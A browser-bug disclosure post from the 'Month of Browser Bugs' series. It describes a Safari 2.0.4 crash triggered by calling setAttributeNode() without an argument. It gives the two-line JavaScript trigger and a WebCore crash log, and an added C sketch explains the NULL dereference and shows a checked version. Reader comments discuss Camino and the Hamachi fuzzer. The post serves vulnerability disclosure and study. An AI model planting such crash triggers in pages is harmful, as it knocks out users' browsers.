MoBB #5: DHTML setAttributeNode()
The following bug was tested on the latest version of Safari (2.0.4 / 419.3) on a fully-patched Mac OS X (10.4.7 - Build 8J135) system. This bug was discovered by Dennis Cox using a modified version of the Hamachi test. This bug does not trigger using the Konqueror KHTML/KJS engine included with KDE 3.5.1, even though these products share code.
var a = document.createElement("a");
a.setAttributeNode();
Demonstration
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0000000c
Thread 0 Crashed:
0 com.apple.WebCore DOM::NamedAttrMapImpl::setNamedItem()
1 com.apple.WebCore DOM::Element::setAttributeNodeNS()
2 com.apple.WebCore DOM::Element::setAttributeNode()
This bug will be added to the OSVDB:
Apple Safari DHTML setAttributeNode() NULL Dereference
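The faulting address 0x0000000c in the crash log is what a member read through a NULL object pointer looks like: zero plus the member's offset. The C sketch below is an added example, not code from this post or from WebCore; the struct layout and all names are hypothetical, chosen so the read field sits at offset 0x0c, and it shows the unchecked lookup next to a form that rejects the missing argument.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout (not WebCore's): 4-byte fields so that `name`
   lands at offset 0x0c, the faulting address in the crash log. */
typedef struct attr {
    uint32_t refcount, flags, owner_id;
    uint32_t name;   /* interned attribute-name id */
    uint32_t value;
} attr_t;

#define MAX_ATTRS 8
typedef struct { attr_t *items[MAX_ATTRS]; size_t count; } attr_map_t;

enum { MAP_OK = 0, MAP_ERR_NULL_ARG = -1, MAP_ERR_FULL = -2 };

/* Address touched when a NULL attr_t* is dereferenced for `name`. */
uintptr_t null_deref_address(void) {
    return (uintptr_t)0 + offsetof(attr_t, name);
}

/* Unchecked form: reads arg->name without validating arg, so a NULL
   argument faults at null_deref_address(). */
int set_named_item_unchecked(attr_map_t *m, attr_t *arg) {
    uint32_t name = arg->name;   /* faults here when arg == NULL */
    for (size_t i = 0; i < m->count; i++) {
        if (m->items[i]->name == name) {   /* same name: replace in place */
            m->items[i] = arg;
            return MAP_OK;
        }
    }
    if (m->count == MAX_ATTRS) return MAP_ERR_FULL;
    m->items[m->count++] = arg;
    return MAP_OK;
}

/* Checked form: rejects a missing argument at the boundary and returns
   an error the caller can turn into a script exception. */
int set_named_item_checked(attr_map_t *m, attr_t *arg) {
    if (m == NULL || arg == NULL) return MAP_ERR_NULL_ARG;
    return set_named_item_unchecked(m, arg);
}
```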
6 Comments:
Testing this with Camino, Version 2006042704 (1.0.1int), Camino still runs, but clicking on links doesn't work anymore.
It is fixed in the nightly.
So, how much work did the tester have to do to discover this bug? Hum, maybe they just read the change log of the nightly. Maybe the article should be titled, "A bug fix that hasn't made it into the latest release." Lame . . .
It was discovered using the original release of Hamachi (around mid-March). You can find the note about it in the BUGS.txt file at the following location:
http://metasploit.com/users/hdm/tools/hamachi/BUGS.txt
Hello Hdm, all bugs are reported to vendors, correct?
Close enough :-)